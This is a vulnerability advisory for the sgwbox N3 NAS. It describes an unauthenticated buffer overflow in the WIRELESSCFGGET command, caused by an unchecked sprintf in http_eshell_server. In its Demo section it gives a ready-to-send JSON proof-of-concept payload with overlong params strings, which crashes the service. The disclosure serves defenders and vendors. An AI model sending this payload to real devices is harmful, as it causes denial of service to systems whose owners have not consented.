Information

Vendor: sgwbox

Affected products: N3 NAS ≤ V2.0.25

Vendor Homepage: https://mall.sgwbox.com/

Vendor contact information: mailto:box@new1cloud.com

image.png

Description

An unauthorized buffer overflow vulnerability exists in the sgwbox NAS N3. This vulnerability stems from the lack of length validation and limitation on fields passed to the WIRELESSCFGGET command interface. An unauthenticated remote attacker could exploit this vulnerability to cause the service crash on the remote target NAS device, enabling a remote denial-of-service attack.

Details

The /usr/sbin/http_eshell_server file shows that the WIRELESSCFGGET command interface does not perform any authentication or verification, and both the first and second parameters of the retrieved params do not have any length validation, but are directly concatenated using the insecure memory copy function sprintf.

image.png

Therefore, an unauthorized buffer overflow vulnerability exists here. An unauthenticated attacker could exploit this vulnerability to cause a remote target NAS device to crash, thus completing a remote denial-of-service attack.

Demo

Without authentication, an attacker sends a POST request message in JSON format to the /eshell API interface without any token information. For the WIRELESSCFGGET command interface, the attacker can write excessively long strings as the first or second parameter of params.

{
  "params": [
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  ],
  "cmd": "WIRELESSCFGGET"
}

image.png

Ultimately, the http_eshell_server service associated with the remote target NAS device crashed, leading to a remote denial-of-service attack.

image.png

image.png

Credit